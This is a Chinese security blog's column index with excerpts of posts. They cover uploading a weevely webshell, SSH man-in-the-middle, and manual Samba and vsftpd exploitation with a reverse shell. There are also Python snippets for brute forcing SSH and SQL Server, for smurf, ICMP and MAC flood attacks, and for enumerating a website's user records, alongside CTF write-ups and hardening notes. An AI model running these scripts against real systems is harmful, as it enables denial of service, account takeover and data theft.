网络空间安全
本专栏着重和大家介绍关于网络空间安全的小知识。
多数为编程实现安全攻防,安全漏洞分析,安全脚本等。
程序小黑
这个人很懒,什么都不想说。。
展开
-
使用工具weevely上传一句话木马
使用 Weevely 查看使用帮助:生成一句话木马后门:Weevely generate password /tmp/backdoor.php也不知道为什么,只有生成在/tmp目录下才有效,所以这里我就生成在/tmp目录下了。这里我们上传到别的机器的web服务器上。然后使用weevely直接切入:拿到shell。这里不是root权限,所以还要自己想办法提权到root权限。。...原创 2022-04-22 09:47:41 · 2458 阅读 · 1 评论 -
TOMCAT 中间件安全加固
1、 tomcat中间件安装:①、yum install httpd* -y②、yum install tomcat* -y然后就能看到系统中多出了个端口:其中8005端口是管理口,8080是默认的tomcat页面我们可以通过访问本地8080口来判断服务是否安装成功其中下文会详细介绍如何更改tomcat的管理口和页面显示端口。其中, Tomcat配置文件所在目录:更改管理端口和服务关闭命令:1、我们进入配置文件:/etc/tomcat/server.xml这段话的意思就是“tom原创 2022-04-03 20:46:30 · 1860 阅读 · 2 评论 -
使用SSHMitm中间人拦截SSH
使用SSHMitm中间人拦截SSH网络拓扑:靶机:metasploitable2-linux攻击机:kali-linux访问者:backtrack5-linuxKali使用ettercap进行中间人攻击(arp欺骗):本处使用ssh登陆远程服务器但是kali没有抓到任何包进行服务版本号扫描判断原因发现版本号为 Openssh4.7,理论上是可以攻击的。但是由于采用了protocol 2版本,所有的信息都是加密的,这里我们采用arpspoof的方法进行中间人攻击来抓包验证。原创 2022-04-02 21:57:21 · 4404 阅读 · 1 评论 -
windows用户验证
在windows的NTLM用户身份验证Windows操作系统中的所有用户的账号密码都是存储在安全账号管理器(SAM)数据库中的。如果该windows开启了域服务(winserver2008以上),那么域用户的账号密码则是存储在Active Directory数据库中的。当然这个数据库也存储用户记录。每个用户账号都是有两个密码。一个LAN密码和一个Windows密码。每个密码都被加密后存储在SAM数据库中或者在Active Directory数据库中。LAN 密码基于OEM字符集,不区分大小写。Wind原创 2022-03-23 11:51:06 · 6146 阅读 · 0 评论 -
SQL Server 安全风险分析
1、 查看SQL SERVER中的所有用户:(SQL 2000或2005都可用)Select * from sysusers;2、 查看SQL SERVER服务器中所有空密码的用户:(2000/2005通用)select name,password from syslogins where password is null;3、 设置mssql只能windows本地账户登陆:4、 设置数据库日志审核:右击数据库,打开数据库属性,选择安全性,将安全性中的审计级别调成全部。5、 进行网络原创 2022-03-23 11:50:06 · 1988 阅读 · 0 评论 -
Free Float 1.0漏洞利用和EXP编写
首先使用ODB运行FTP SERVER 1.0带有缓冲区溢出漏洞的程序,然后按下F9让ODB运行我们带有漏洞的程序。我们先使用kali自带的pattern_create.rb这个脚本来生成一串用于测试缓冲区溢出的代码,以便我们在下一步测试缓冲区大小。这里我们所要使用的脚本位于/usr/share/metasplot-framework/exploit/tools下。这个目录下存在脚本pattern_create.rb文件,我们使用命令./pattern_create.rb -l 1000原创 2022-03-23 11:43:00 · 415 阅读 · 0 评论 -
vsftp2.3.4和samba3.x手工利用和加固
1、SAMBA usermap script漏洞手工利用Samba连接带有漏洞的靶机。 设置监听模块。并设置payload 为cmd/unix/reverse设置参数后运行,然后使用sambaclient连接靶机即可。2、vsftpd2.3.4手工利用smbusermap加固方法:vim /etc/samba/smb.conf注释:username map script = /etc/samba/scripts/mapusers.shvsftpd加固方法;vim /etc/vs原创 2022-03-23 11:39:11 · 1678 阅读 · 0 评论 -
IIS服务相关介绍
在不同版本的操作系统上安装并运行着不同的iis服务器。其中win2003对应的是iis6.0,win2008对应的是iis7.0,win2012对应的是iis8.0我们现在先着重了解iis7.iis7有两个模式, 经典模式和集成模式。IIS7其中经典模式的W3WP.exe工作方式就是IIS6的处理方式. IIS7集成模式是一个伟大的改进,让IIS集成了.NET功能(不在依靠之前IIS版本的aspnet_ISPAI.DLL),也就是说所有的HTTP Request请求都要经过.NET来处理(包括html原创 2022-03-22 10:41:09 · 2833 阅读 · 1 评论 -
IIS安全和NTFS分区安全
准备工作:1、 运行环境:windows server20082、 文件系统:各分区系统为NTFS3、 站点文件夹:web1、web24、 新建站点指定ip都为192.168.199.39,端口分别666、888完成后添加默认文档:访问后确定环境搭建成功!然后新建一个组web,以后所有站点的用户全部隶属于该组,以便于权限分配并新建两个用户web1和web2.全部隶属于web组。现在打开各分区,禁止web组的所有权限,分别授予web1,web2用户对自己目录的权限,其中web2用原创 2022-03-22 10:38:18 · 435 阅读 · 0 评论 -
IIS7可配置性
IS7.0使用了一个名为apploicationHost.config的文件保存设置。此外,针对一个独立的web网站或web应用程序,iis7的配置选项也是可以随着ASP.NET的设置一同保存在web.config文件中,当然IIS7的配置选项保存在该文件的system.webServer中。使用applicationHost.config配置文件。IIS7使用文件applicationHost.config为web服务器和进程模型保存iis配置。现在,全局配置保存在%windir%system32%原创 2022-03-22 10:36:12 · 313 阅读 · 0 评论 -
使用python利用xp_cmdshell批量执行系统命令
#coding=utf-8import pymssqlimport sysfrom threading import *def connect(ip,username="sa",password="123456",database="MyDB"): conn = pymssql.connect(ip,username,password,autocommit=True,timeout=2) cursor = conn.cursor() query = "sp_configur原创 2022-03-22 10:29:53 · 1410 阅读 · 0 评论 -
使用python实现SQL server的暴力破解
import optparseimport pymssqldef connectdatabase(filename,ip,dbname): with open(filename) as f: for content in f.readlines(): allcontent = content.replace('\n','') result = allcontent.split(':') username = result[0] password = result[1]原创 2022-03-22 10:28:36 · 1503 阅读 · 0 评论 -
使用Python实现ssh的暴力破解
#!/usr/bin/python# -*- coding:utf-8 -*-import sshclassimport sysimport threadingimport timereload(sys)sys.setdefaultencoding('utf-8')__metaclass__ = typeclass Threadssh(threading.Thread): def __init__(self, func, args): threading.原创 2022-03-22 10:27:44 · 1255 阅读 · 0 评论 -
使用Python实现批量SSH弱密码检测
#!/usr/bin/python# -*- coding:utf-8 -*-import sshclassimport sysimport threadingimport timereload(sys)sys.setdefaultencoding('utf-8')__metaclass__ = typeclass Threadssh(threading.Thread): def __init__(self, func, args): threading.原创 2022-03-22 10:38:36 · 676 阅读 · 0 评论 -
使用python实现smurf攻击
from scapy.all import *from time import sleepimport _threadimport random target = '192.168.113.100'threadnum = 200def smurf(target): while True: send(IP(src=target, dst="192.168.113.255")/ICMP(), count=100, verbose=0)def attack(targ原创 2022-03-21 09:39:20 · 520 阅读 · 0 评论 -
使用python实现nmap的UDP扫描
import socketimport timefrom scapy.all import *import optparsedef tcpconnect(host,port): try: conn = socket.socket(socket.AF_INET,socket.SOCK_STREAM) conn.connect((host,port)) print '[+]%d/tcp open' % (port) conn.close() except: passdef ud原创 2022-03-21 09:38:50 · 706 阅读 · 1 评论 -
使用Python实现路由追踪脚本
from scapy.all import *import sysfrom socket import *import osfrom threading import *screenlock=Semaphore(value=500)def gsd(): print '[*]TCP routing' try: r2,unans=traceroute([sys.argv[1]],dport=[sys.argv[2]],maxttl=20) except Exc原创 2022-03-21 09:38:00 · 962 阅读 · 0 评论 -
CTF比赛中使用Python通过Mysql漏洞获取FLAG
#!/usr/bin/env pythonimport MySQLdbdef Mysql_Inject(ip,flag): db = MySQLdb.connect("127.0.0.1","root","123456","python") cursor = db.cursor() try: query = "insert into py values(\"%s\",\"%s\");"%(ip,flag) cursor.execute(query原创 2022-03-21 09:36:37 · 1308 阅读 · 0 评论 -
使用python的scapy模块实现mac地址泛洪
#!usr/bin/python#-*- coding:utf-8 -*-import sysfrom scapy.all import *def mac_floodatt(interface): attackpacket = Ether(src=RandMAC(), dst=RandMAC())/IP(src=RandIP('*.*.*.*'), dst=RandIP('*.*.*.*'))/ICMP() #attackpacket = Ether(srlc=RandMAC()原创 2022-03-21 09:34:23 · 906 阅读 · 0 评论 -
Python使用SCAPY实现icmp flood的方法
#!usr/bin/python#-*- coding:utf-8 -*-import sysfrom scapy.all import *def mac_floodatt(interface): data = '0123456789012309129834912734981270497810892471241209478812094701298471208947120974123089471208974089127498127390481270491297341230894308927原创 2022-03-21 09:30:27 · 847 阅读 · 0 评论 -
使用Python实现某网站的用户数据遍历实现方法
本方法是很久以前的实现方法,目前网站不确定能用,代码中的网站信息已隐藏。import urllibimport reimport base64import randomdef get_user_info(phone): userinfo = base64.b64encode(phone) url = "http://********/?q=user_manager/user_info/" + str(userinfo) + "/detailInfo" response =原创 2022-03-21 09:28:43 · 509 阅读 · 0 评论 -
Python学习过程的脚本记录(2)——网络脚本
使用Python实现DOS攻击(SCAPY模块)#-*- coding:UTF-8 -*-import timeimport sysimport threadingfrom scapy.all import *def start_attack(): ip_adress = "" data = "X"*1300 ip_adress = sys.argv[1] send(IP(dst=ip_adress)/ICMP()/data, verbose=False, loop=1)if原创 2022-03-21 09:26:24 · 690 阅读 · 2 评论 -
GJCTF 官方WP WEB部分(1)
1.题目链接:http://www.czlgjbbq.top/GJCTF/brute.php本题推荐使用python来暴力破解密码。脚本如下:import requestsimport res = requests.session()html = s.get('http://www.czlgjbbq.top/GJCTF/brute.php')session = ""for i in ...原创 2018-11-27 16:43:19 · 36270 阅读 · 0 评论 -
linux下/etc/rc.local的相关问题
今天在布环境的时候,遇到了一些小问题。主要是自己写了一个python的程序,并在其中使用了subprocess模块,使其产生子进程并调用我的新elf文件(linux下的二进制可执行文件)。由于我的python脚本和elf文件是放在一起的,所以我在subprocess.Popen中就直接使用了./***来执行我的elf文件,导致的结果就是我执行文件后没有得到任何返回信息。。也就是elf文件没有执行...原创 2018-12-11 12:46:19 · 33533 阅读 · 2 评论 -
X86_64 ABI调用约定
cdecl(代表C声明)是一种调用约定,它起源于C编程语言,许多C编译器都将它用于x86体系结构。在cdecl中,子例程参数在堆栈中传递。在EAX寄存器中返回整数值和内存地址,在ST0 x87寄存器中返回浮点值。寄存器EAX、ECX和EDX被调用保存,其余的被调用保存。当调用新函数时,x87浮点寄存器ST0到ST7必须为空(弹出或释放),而ST1到ST7在退出函数时必须为空。ST0在不用于返回值时...原创 2018-12-10 20:39:43 · 34273 阅读 · 0 评论 -
linux系统下安装msf框架
命令:wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.runchmod 755 metasploit-latest-linux-installer.run./metasploit-latest-linux-installer.run等待运行结束即可。关...原创 2018-12-10 13:23:04 · 38329 阅读 · 3 评论 -
httpd.conf 安全配置
ServerTokens Prod //默认为OS,当其为Prod时,则当用户访问不存在页面时,不显示系统版本号ServerRoot “/etc/httpd” //用于指定Apache的运行目录,服务启动之后自动将目录改变为当前目录,在后面使用到的所有相对路径都是相对这个目录下PidFile run/httpd.pid //设定apache守护进程的pid号。Timeout...原创 2018-12-07 13:33:53 · 33220 阅读 · 0 评论 -
GJCTF 官方WP PWN部分
GJCTF 官方WP PWN部分1、题目链接:http://www.czlgjbbq.top/GJCTF/pwn_stack连接方式:nc 188.131.185.193 50000逆向分析:使用IDA32打开。定位MAIN函数,F5看源码。很容易发现存在危险函数strcpy,并存在溢出漏洞。v5在这里是ID,v4在这里是name,程序我们需要通过覆盖name来让ID为1000,从而...原创 2018-12-02 15:03:11 · 34655 阅读 · 2 评论 -
GJCTF 官方WP WEB部分(2)
GJCTF 官方WP WEB部分(2)1、题目链接:http://www.czlgjbbq.top/GJCTF/extract.php首先WEB题的常规思路,右击查看源代码。发现部分代码泄露。很明显的变量覆盖漏洞。这里可以使用火狐的hackbar插件或者是自己写一个python脚本。在传递Password的同时,同时传递一个thepassword_123即可。这里的thepassword...原创 2018-12-02 14:01:31 · 35141 阅读 · 0 评论 -
GJCTF官方WP 隐写+逆向
先分享一波题目链接:http://www.czlgjbbq.top/GJCTF/index.php由于最近一直有人问我要GJCTF的WP,所以我就写了一份,以供参考,但是本WP只提供参考之用,不是唯一答案。当前本平台共有 隐写题:3题 逆向:3题 WEB:13题一、隐写题:①题目链接:http://www.czlgjbbq.top/GJCTF/yx1.exe成功下载文件后,使用winh...原创 2018-11-27 16:04:09 · 36267 阅读 · 0 评论 -
NCTF 2018部分WP(3)
WEB-基本操作这道题是郁离歌学姐出的,基本操作。一进去就是一个PHPMyAdmin的页面。直接右击查看网页源代码。这道题本身也好像是在想方设法的告诉我们这个MYSQL的版本是4.8.1。一个一个尝试账号密码==猜了半天最后还是某位大佬告诉我这个账号密码都是guest。。。然后就开始尝试PHPMyadmin的本地文件包含漏洞,希望能够找到flag文件。首先要知道在URL编码中%3f是用...原创 2018-11-27 15:10:30 · 35985 阅读 · 0 评论 -
NCTF2018部分题WP(2)
第一题:滴!晨跑打卡这道题过滤了空格,但是可以使用url编码来绕过,这里我们可以使用%a0,也就是加号来绕过。首先查列数:编码:1%27%a0union%a0select%a01,2,3%27#很明显可以查出是三列。然后就是查数据库名:编码:id=1%27%a0union%a0select%a01,(SELECT%a0GROUP_CONCAT(SCHEMA_NAME)%a0FROM%...原创 2018-11-27 10:51:51 · 37639 阅读 · 0 评论 -
CG-CTF GBKinject
题目地址:http://chinalover.sinaapp.com/SQL-GBK/index.php首先观察源代码,发现是gbk编码,考虑到GBK INJECT题目没有做任何过滤。爆库名:http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,database()%23库名:...原创 2018-11-26 17:54:38 · 35697 阅读 · 0 评论 -
NCTF 2018 部分题目 WP(1)
WEB-签到题:直接看cookie就好了,直接拿到flagRE-后门后门后门:下载一个64位的.exe程序,ida直接打开,观察main函数,发现函数hereisyourflag(void),发现数组变量flagenc,转成char型。直接拿到flag。3.PWN-sendflag:IDA打开,很明显溢出了。直接发送六个a拿到flag。4.MISC-CalcNow:NC连...原创 2018-11-25 09:01:58 · 37114 阅读 · 0 评论 -
CTF平台搭建,欢迎来战!
今天闲来无事,就做了一个CTF平台,地址是http://www.czlgjbbq.top/GJCTF/index.php,如果各位有兴趣,可以来挑战一下自己。Welcome to mine CTF!原创 2018-11-21 20:51:38 · 41032 阅读 · 6 评论 -
FBCTF平台搭建
自从入了安全的坑,就喜欢去各大CTF平台战斗==其实我也特别想拥有一个属于自己的CTF平台。直到我有一天发现了一个炫酷的平台——FBCTF。首先你要使用Ubuntu来安装并运行这个平台。我在kali里装过,没装上去。好像是python的一个模块一直装不上跳错。至于别的操作系统我就没有试过了。。这里官方钦定版本是ubuntu14.0.3.但是其实你ubuntu的版本在2016年之后的理论上都是可...原创 2018-11-02 08:29:18 · 41989 阅读 · 5 评论 -
BUGKU_CTF WEB 20题writeup
首先知道该页面存在sql注入漏洞。先判断是否存在注入点。发现是单引号闭合注入。通过页面回显信息判断当前列数判断页面中可以回显的点爆库名使用命令:0’ union select table_name,2,3,4 from information_schema.tables where table_schema=‘skctf_flag’#爆表名使用命令‘:0’ union sele...原创 2018-10-20 13:36:16 · 45410 阅读 · 0 评论 -
BUGKU_CTF WEB(21-35) writeUP
第21题:秋名山老司机根据题目要求可以看出题目要求在两秒内计算出div标签中给出的值。这里采用py传递value参数。通过post传递参数。session保持会话,从而拿到flag。第22题:速度要快。burp抓包发现一个response请求头。里面有一个flag属性。第一次判断是base64加密的。观察注释。传post传margin,控制session保持flag不变。写python。...原创 2018-10-31 12:59:30 · 41828 阅读 · 0 评论 -
BUGKU_CTF WEB(1-10)writeUP
第一题:WEB2右击查看查看源代码或者直接F12审查元素就可以看到flag值了。第二题:计算器右击审查元素,发现input表单里有一个maxlenth属性。将属性值调大,就可以输入计算结果,从而拿到flag。当然burp抓包和自制表单也可以实现该功能。第三题:WEB基础$_GET可以通过查看给出源码直接传递GET参数。拿到flag第四题:WEB基础$_POST可以自己通过写一个...原创 2018-10-19 16:00:52 · 45124 阅读 · 0 评论 -
BUGKU_CTF WEB(10-19)writeUP
第11题:web5查看页面源代码,发现被隐藏掉的代码。怀疑是javascript代码。网上试了各种解密和解压缩方法都不行。试了试直接在console控制台运行。成功运行并拿到flag。第12题:头等舱。查看页面源代码和web请求。发现什么都没有,空空如也。于是开了bt抓包。通过网页的response发现了headers中藏有flag值第13题:网站被黑首先查看网站源代码。发现网站没有什...原创 2018-10-20 08:41:36 · 46115 阅读 · 0 评论